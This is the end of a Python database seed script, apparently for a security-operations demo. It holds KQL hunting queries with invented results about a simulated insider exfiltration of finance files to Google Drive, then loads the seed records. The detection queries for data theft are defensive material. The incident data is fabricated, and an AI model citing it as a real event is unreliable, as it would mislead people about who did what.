        execution_timestamp=datetime(2026, 2, 14, 12, 0, 0),
        result_count=3,
        mitre_techniques_json=json.dumps(["T1567"]),
        result_columns_json=json.dumps(["Timestamp", "DeviceName", "AccountName", "RemoteUrl", "SentBytes"]),
        result_rows_json=json.dumps([
            ["2026-02-14 11:15:00", "FIN-WS-023", "per.berg", "drive.google.com/upload", "4,509,715,456"],
            ["2026-02-14 11:18:00", "FIN-WS-023", "per.berg", "drive.google.com/upload", "2,254,857,728"],
            ["2026-02-14 11:20:30", "FIN-WS-023", "per.berg", "drive.google.com/upload", "1,073,741,824"],
        ]),
    ),
    KQLQuery(
        query_name="Sensitive file access",
        query_description="Find file read events matching sensitive naming patterns on the device.",
        kql_statement="DeviceFileEvents\n| where DeviceName == 'FIN-WS-023'\n| where ActionType == 'FileRead'\n| where FileName has_any ('financial', 'salary', 'confidential', 'Q4')\n| project Timestamp, FileName, FolderPath, InitiatingProcessFileName, AccountName",
        related_entity_type="device",
        related_entity_id="FIN-WS-023",
        execution_timestamp=datetime(2026, 2, 14, 12, 5, 0),
        result_count=4,
        mitre_techniques_json=json.dumps(["T1005"]),
        result_columns_json=json.dumps(["Timestamp", "FileName", "FolderPath", "InitiatingProcessFileName", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-14 11:10:02", "Q4_financials_2025.xlsx", "C:\\Finance\\Reports\\", "explorer.exe", "per.berg"],
            ["2026-02-14 11:11:15", "employee_salaries_2026.xlsx", "C:\\Finance\\HR\\", "explorer.exe", "per.berg"],
            ["2026-02-14 11:12:30", "confidential_merger_docs.pdf", "C:\\Finance\\M&A\\", "explorer.exe", "per.berg"],
            ["2026-02-14 11:13:44", "Q4_revenue_forecast.xlsx", "C:\\Finance\\Reports\\", "explorer.exe", "per.berg"],
        ]),
    ),
    KQLQuery(
        query_name="USB and removable media activity",
        query_description="Check for any removable media events that may indicate staging data for exfiltration.",
        kql_statement="DeviceEvents\n| where DeviceName == 'FIN-WS-023'\n| where ActionType has_any ('UsbDriveMounted', 'RemovableStoragePolicyTriggered')\n| project Timestamp, ActionType, AdditionalFields, AccountName",
        related_entity_type="device",
        related_entity_id="FIN-WS-023",
        execution_timestamp=datetime(2026, 2, 14, 12, 10, 0),
        result_count=0,
        mitre_techniques_json=json.dumps(["T1052.001"]),
        result_columns_json=json.dumps(["Timestamp", "ActionType", "AdditionalFields", "AccountName"]),
        result_rows_json=json.dumps([]),
    ),
]


def seed():
    init_db()
    with Session(engine) as session:
        # Only seed if the database is empty
        existing = session.exec(select(Incident)).first()
        if existing:
            print("Database already seeded, skipping.")
            return

        for incident in INCIDENTS:
            session.add(incident)
        for fi in FILE_INTELLIGENCE:
            session.add(fi)
        for dc in DEVICE_CONTEXTS:
            session.add(dc)
        for uc in USER_CONTEXTS:
            session.add(uc)
        for cc in CAMPAIGN_CONTEXTS:
            session.add(cc)
        for ma in MALWARE_ANALYSES:
            session.add(ma)
        for kq in KQL_QUERIES:
            session.add(kq)
        session.commit()
        print(f"Seeded {len(INCIDENTS)} incidents, {len(FILE_INTELLIGENCE)} file intelligence, "
              f"{len(DEVICE_CONTEXTS)} device contexts, {len(USER_CONTEXTS)} user contexts, "
              f"{len(CAMPAIGN_CONTEXTS)} campaigns, {len(MALWARE_ANALYSES)} malware analyses, "
              f"{len(KQL_QUERIES)} KQL queries.")


if __name__ == "__main__":
    seed()
